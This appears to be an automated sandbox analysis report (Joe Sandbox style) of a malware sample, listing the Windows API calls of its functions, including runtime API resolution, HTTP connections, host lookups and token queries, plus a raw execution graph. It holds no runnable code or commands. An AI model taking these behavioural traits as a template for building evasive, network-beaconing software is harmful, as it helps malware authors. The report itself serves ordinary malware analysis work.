                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
                    • Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
                    • Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
                    • Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • WSAStartup.WS2_32(00000202,?), ref: 001F14E2
                  • gethostname.WS2_32(?,000000FF), ref: 001F1502
                  • getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 001F1522
                  • freeaddrinfo.WS2_32(00000000), ref: 001F1580
                  • WSACleanup.WS2_32 ref: 001F1586
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 001E4FA0: memcpy.MSVCRT ref: 001E5018
                    • Part of subcall function 001E4FA0: memcpy.MSVCRT ref: 001E5035
                  • _time64.MSVCRT ref: 001EA97C
                  • _time64.MSVCRT ref: 001EAA0E
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                    • Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
                    • Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
                    • Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
                    • Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042
                  • _time64.MSVCRT ref: 001EAAEE
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • _wtoi.MSVCRT ref: 001F113E
                  • _wtoi.MSVCRT ref: 001F1149
                    • Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
                    • Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
                    • Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
                    • Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042
                  • memcpy.MSVCRT ref: 001F11B4
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • LoadLibraryW.KERNEL32(?), ref: 001E7EEB
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001E7F11
                  • GetLastError.KERNEL32 ref: 001E7F44
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                    • Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
                    • Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
                    • Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
                    • Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 001E5A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001F00C1), ref: 001E5B3F
                  • ??2@YAPAXI@Z.MSVCRT ref: 001EDA7A
                  • ??3@YAXPAX@Z.MSVCRT ref: 001EDAB9
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                  • _time64.MSVCRT ref: 001EDADB
                  • ??3@YAXPAX@Z.MSVCRT ref: 001EDB0B
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 001EC8C0: GetFullPathNameW.KERNEL32(?,00000105,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 001EC938
                  • _time64.MSVCRT ref: 001F0D4F
                    • Part of subcall function 001E1C30: ??2@YAPAXI@Z.MSVCRT ref: 001E1C52
                    • Part of subcall function 001E1C30: ??3@YAXPAX@Z.MSVCRT ref: 001E1C9A
                    • Part of subcall function 001E7A20: SysFreeString.OLEAUT32(?), ref: 001E7A3C
                  • ??3@YAXPAX@Z.MSVCRT ref: 001F0D82
                    • Part of subcall function 001EF0B0: ??2@YAPAXI@Z.MSVCRT ref: 001EF1C7
                    • Part of subcall function 001EF0B0: ??3@YAXPAX@Z.MSVCRT ref: 001EF206
                    • Part of subcall function 001EF0B0: ??3@YAXPAX@Z.MSVCRT ref: 001EF29B
                  • _time64.MSVCRT ref: 001F0D9D
                  • ??3@YAXPAX@Z.MSVCRT ref: 001F0DCC
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 001E5A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001F00C1), ref: 001E5B3F
                  • ??2@YAPAXI@Z.MSVCRT ref: 001F1D7F
                  • ??3@YAXPAX@Z.MSVCRT ref: 001F1DBE
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                  • _time64.MSVCRT ref: 001F1DE0
                  • ??3@YAXPAX@Z.MSVCRT ref: 001F1E0D
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 001E995A: GetModuleHandleA.KERNEL32(00000000), ref: 001E9961
                  • __set_app_type.MSVCRT ref: 001F37C0
                  • __p__fmode.MSVCRT ref: 001F37D6
                  • __p__commode.MSVCRT ref: 001F37E4
                  • __setusermatherr.MSVCRT ref: 001F3805
                    • Part of subcall function 001E1401: _controlfp.MSVCRT ref: 001E140B
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • InterlockedDecrement.KERNEL32(?), ref: 001E7CFE
                  • SysFreeString.OLEAUT32(00000000), ref: 001E7D13
                  • ??_V@YAXPAX@Z.MSVCRT ref: 001E7D21
                  • ??3@YAXPAX@Z.MSVCRT ref: 001E7D2A
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
                    • Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
                    • Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
                    • Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042
                  • wsprintfW.USER32 ref: 001F1829
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                  • rand.MSVCRT ref: 001F1880
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 001EA660: SysFreeString.OLEAUT32(00000000), ref: 001EA679
                    • Part of subcall function 001EA660: SysFreeString.OLEAUT32(00000001), ref: 001EA683
                  • SysFreeString.OLEAUT32(?), ref: 001E24BB
                    • Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
                    • Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
                    • Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
                    • Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042
                  • SysFreeString.OLEAUT32(?), ref: 001E23B8
                    • Part of subcall function 001EB300: SysFreeString.OLEAUT32(?), ref: 001EB318
                    • Part of subcall function 001EB300: SysFreeString.OLEAUT32(?), ref: 001EB321
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 001E6E00: GetTokenInformation.KERNELBASE(?,00000001,?,0000004C,?), ref: 001E6E5D
                    • Part of subcall function 001EFBD0: GetProcAddress.KERNEL32(00000000,?), ref: 001EFC4F
                    • Part of subcall function 001EFBD0: GetProcAddress.KERNEL32(00000000,?), ref: 001EFC72
                    • Part of subcall function 001EFBD0: GetProcAddress.KERNEL32(00000000,?), ref: 001EFC95
                    • Part of subcall function 001EFBD0: GetProcAddress.KERNEL32(00000000,?), ref: 001EFCB8
                  • SHGetFolderPathW.SHELL32(00000000,0000001C,?,00000000,?), ref: 001E4451
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                    • Part of subcall function 001EC430: GetProcAddress.KERNEL32(00000000,?), ref: 001EC4E2
                    • Part of subcall function 001EC430: GetProcAddress.KERNEL32(00000000,?), ref: 001EC505
                    • Part of subcall function 001EC430: GetProcAddress.KERNEL32(00000000,?), ref: 001EC528
                    • Part of subcall function 001EC430: GetProcAddress.KERNEL32(00000000,?), ref: 001EC54B
                    • Part of subcall function 001EC430: GetLastError.KERNEL32 ref: 001EC6BB
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • _wtoi.MSVCRT ref: 001EB047
                    • Part of subcall function 001E6190: _itow.MSVCRT ref: 001E61DE
                  • _wtoi.MSVCRT ref: 001EB091
                    • Part of subcall function 001E43F0: SHGetFolderPathW.SHELL32(00000000,0000001C,?,00000000,?), ref: 001E4451
                    • Part of subcall function 001E89B0: memset.MSVCRT ref: 001E89FA
                    • Part of subcall function 001E89B0: memset.MSVCRT ref: 001E8A0C
                    • Part of subcall function 001E89B0: memcpy.MSVCRT ref: 001E8F45
                    • Part of subcall function 001EDF10: memcpy.MSVCRT ref: 001EDF48
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                    • Part of subcall function 001E1690: memset.MSVCRT ref: 001E16CE
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • _wtoi.MSVCRT ref: 001EF6D2
                    • Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
                    • Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
                    • Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
                    • Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042
                  • memcpy.MSVCRT ref: 001EF744
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 001E1690: memset.MSVCRT ref: 001E16CE
                  • ??3@YAXPAX@Z.MSVCRT ref: 001EFB8D
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                  • ??3@YAXPAX@Z.MSVCRT ref: 001EFBA4
                    • Part of subcall function 001E6EE0: ??3@YAXPAX@Z.MSVCRT ref: 001E6F12
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 001E3748
                  • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 001E3773
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • WinHttpCloseHandle.WINHTTP(?,00000000,00000000,00000001,?,001F2FF0,?,00000000), ref: 001E8330
                  • WinHttpConnect.WINHTTP(?,?,001F2FF0,00000000,00000001,00000000,00000000,00000001,?,001F2FF0,?,00000000), ref: 001E835D
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 001E5050: WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,001F8880,?), ref: 001E508D
                  • memset.MSVCRT ref: 001E1BA3
                  • memset.MSVCRT ref: 001E1BB2
                    • Part of subcall function 001E4A60: GetProcAddress.KERNEL32(00000000), ref: 001E4AC4
                  • ??2@YAPAXI@Z.MSVCRT ref: 001E1BC9
                  • ??2@YAPAXI@Z.MSVCRT ref: 001E1BE8
                    • Part of subcall function 001F1690: wsprintfW.USER32 ref: 001F1829
                    • Part of subcall function 001F1690: rand.MSVCRT ref: 001F1880
                    • Part of subcall function 001ECF80: _time64.MSVCRT ref: 001ECF92
                    • Part of subcall function 001ECF80: _time64.MSVCRT ref: 001ECFD9
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

                  Execution Graph

                  Execution Coverage:22.5%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:1.1%
                  Total number of Nodes:700
                  Total number of Limit Nodes:15

                  Graph

                  execution_graph 8761 17ab80 8762 17aba5 8761->8762 8767 17abad 8761->8767 8763 17ad68 SysFreeString 8764 17ad6f 8763->8764 8765 17ad76 SysFreeString 8764->8765 8766 17ad7d 8764->8766 8765->8766 8769 17ad59 8767->8769 8779 182db0 8767->8779 8769->8763 8769->8764 8770 17ac37 SysFreeString 8776 17abe9 8770->8776 8771 17ac48 SysFreeString 8771->8776 8772 182db0 tolower 8772->8776 8773 17aca0 _wtoi 8773->8776 8774 17acd0 SysAllocString 8774->8776 8776->8769 8776->8770 8776->8771 8776->8772 8776->8773 8776->8774 8783 17bc60 8776->8783 8786 173f10 8776->8786 8829 17df60 8776->8829 8780 182dca 8779->8780 8781 182dcf 8779->8781 8780->8781 8782 182de7 tolower 8780->8782 8781->8776 8782->8780 8782->8781 8784 17bc79 8783->8784 8785 17bc6a HeapFree 8783->8785 8784->8776 8785->8784 8792 173f4a 8786->8792 8787 174304 8788 174315 8787->8788 8789 17430e SysFreeString 8787->8789 8790 174323 8788->8790 8791 17431c SysFreeString 8788->8791 8789->8788 8790->8776 8791->8790 8792->8787 8851 181f60 8792->8851 8794 173f99 8795 181f60 10 API calls 8794->8795 8796 173fad 8795->8796 8797 181f60 10 API calls 8796->8797 8798 173fc1 8797->8798 8799 181f60 10 API calls 8798->8799 8800 173fd4 8799->8800 8803 1742f4 8800->8803 8804 174224 8800->8804 8805 174027 SysFreeString 8800->8805 8807 17403c SysFreeString 8800->8807 8820 1740e7 _wtoi 8800->8820 8825 1742d0 8800->8825 8826 17434d 8800->8826 8827 17bc60 HeapFree 8800->8827 8828 174160 rand 8800->8828 8871 1791c0 8800->8871 8874 177b80 8800->8874 8801 17bc60 HeapFree 8801->8803 8802 17bc60 HeapFree 8802->8787 8803->8787 8803->8802 8806 17bc60 HeapFree 8804->8806 8810 174231 8804->8810 8805->8800 8806->8810 8807->8800 8808 181f60 10 API calls 8811 174256 8808->8811 8809 17bc60 HeapFree 8812 174241 8809->8812 8810->8809 8810->8812 8813 181f60 10 API calls 8811->8813 8812->8808 8814 17426b 8813->8814 8815 17bc60 HeapFree 8814->8815 8818 1742c0 8814->8818 8815->8818 8816 17bc60 HeapFree 8816->8825 8818->8816 8818->8825 8878 176740 8820->8878 8821 174366 8824 17bc60 HeapFree 8821->8824 8823 17bc60 HeapFree 8823->8826 8824->8825 8825->8801 8826->8821 8826->8823 8827->8800 8828->8800 8830 17df90 8829->8830 8897 173350 8830->8897 8832 17e148 SysFreeString 8833 17e14b 8832->8833 8835 17e155 8833->8835 8836 17e152 SysFreeString 8833->8836 8834 17e13a 8834->8832 8834->8833 8837 17e15c SysFreeString 8835->8837 8838 17e15f 8835->8838 8836->8835 8837->8838 8838->8776 8839 17e007 SysFreeString 8849 17df9b 8839->8849 8840 17e014 SysFreeString 8840->8849 8841 17e021 SysFreeString 8841->8849 8844 1791c0 memset memcpy 8844->8849 8846 171a60 SysAllocString 8847 17e0f3 ??2@YAPAXI 8846->8847 8847->8849 8849->8834 8849->8839 8849->8840 8849->8841 8849->8844 8849->8846 8904 17b300 8849->8904 8910 17a250 8849->8910 8915 171a60 8849->8915 8919 172200 SysAllocString SysAllocString 8849->8919 8920 180c60 8849->8920 8852 181f75 8851->8852 8853 182020 8851->8853 8885 176d80 8852->8885 8855 18203b RtlAllocateHeap 8853->8855 8856 182027 RtlReAllocateHeap 8853->8856 8855->8794 8856->8794 8858 176d80 2 API calls 8859 181f9a GetProcAddress 8858->8859 8860 181fbb 8859->8860 8861 181fb3 8859->8861 8862 176d80 2 API calls 8860->8862 8861->8794 8863 181fc6 GetProcAddress 8862->8863 8863->8861 8864 181fd9 8863->8864 8865 176d80 2 API calls 8864->8865 8866 181fe4 GetProcAddress 8865->8866 8866->8861 8867 181ff7 8866->8867 8868 176d80 2 API calls 8867->8868 8869 182002 GetProcAddress 8868->8869 8869->8861 8870 182015 GetProcessHeap 8869->8870 8870->8853 8872 1814a0 2 API calls 8871->8872 8873 1791d9 8872->8873 8873->8800 8875 177bab 8874->8875 8876 177b97 8874->8876 8875->8800 8876->8875 8877 181f60 10 API calls 8876->8877 8877->8876 8879 176794 8878->8879 8880 17674d 8878->8880 8879->8800 8881 176760 8880->8881 8882 181f60 10 API calls 8880->8882 8881->8800 8883 17677e 8882->8883 8883->8879 8884 17bc60 HeapFree 8883->8884 8884->8879 8888 1814a0 8885->8888 8891 175140 8888->8891 8892 175160 8891->8892 8893 1752a8 LoadLibraryA 8891->8893 8892->8893 8894 175216 memset 8892->8894 8895 17522c 8892->8895 8893->8858 8894->8895 8895->8893 8896 175292 memcpy 8895->8896 8896->8893 8898 17337f 8897->8898 8899 17335b 8897->8899 8900 17bc60 HeapFree 8898->8900 8899->8898 8929 17a0d0 8899->8929 8901 173388 8900->8901 8901->8849 8905 17b30b 8904->8905 8909 17b329 8904->8909 8907 17b312 SysFreeString SysFreeString 8905->8907 8906 17bc60 HeapFree 8908 17b332 8906->8908 8907->8907 8907->8909 8908->8849 8909->8906 8911 17b300 3 API calls 8910->8911 8913 17a26e 8911->8913 8912 17a2b6 8912->8849 8913->8912 8914 181f60 10 API calls 8913->8914 8914->8912 8916 171a70 8915->8916 8918 171a93 8915->8918 8916->8918 8934 17f560 8916->8934 8918->8849 8919->8849 8921 180c71 8920->8921 8922 180cc8 8920->8922 8923 181f60 10 API calls 8921->8923 8922->8849 8924 180c84 8923->8924 8924->8922 8925 180c8b ??2@YAPAXI 8924->8925 8926 180c9b 8925->8926 8927 180cad 8925->8927 8937 172200 SysAllocString SysAllocString 8926->8937 8927->8849 8930 17a0e0 SysFreeString 8929->8930 8931 17a0e3 8929->8931 8930->8931 8932 17a0ea SysFreeString 8931->8932 8933 173370 ??3@YAXPAX 8931->8933 8932->8933 8933->8899 8935 17f56d SysAllocString 8934->8935 8936 17f584 8934->8936 8935->8936 8936->8918 8937->8927 9141 173b37 9142 173b40 9141->9142 9160 175a90 9142->9160 9144 173ca8 9145 173cbc 9144->9145 9148 181f60 10 API 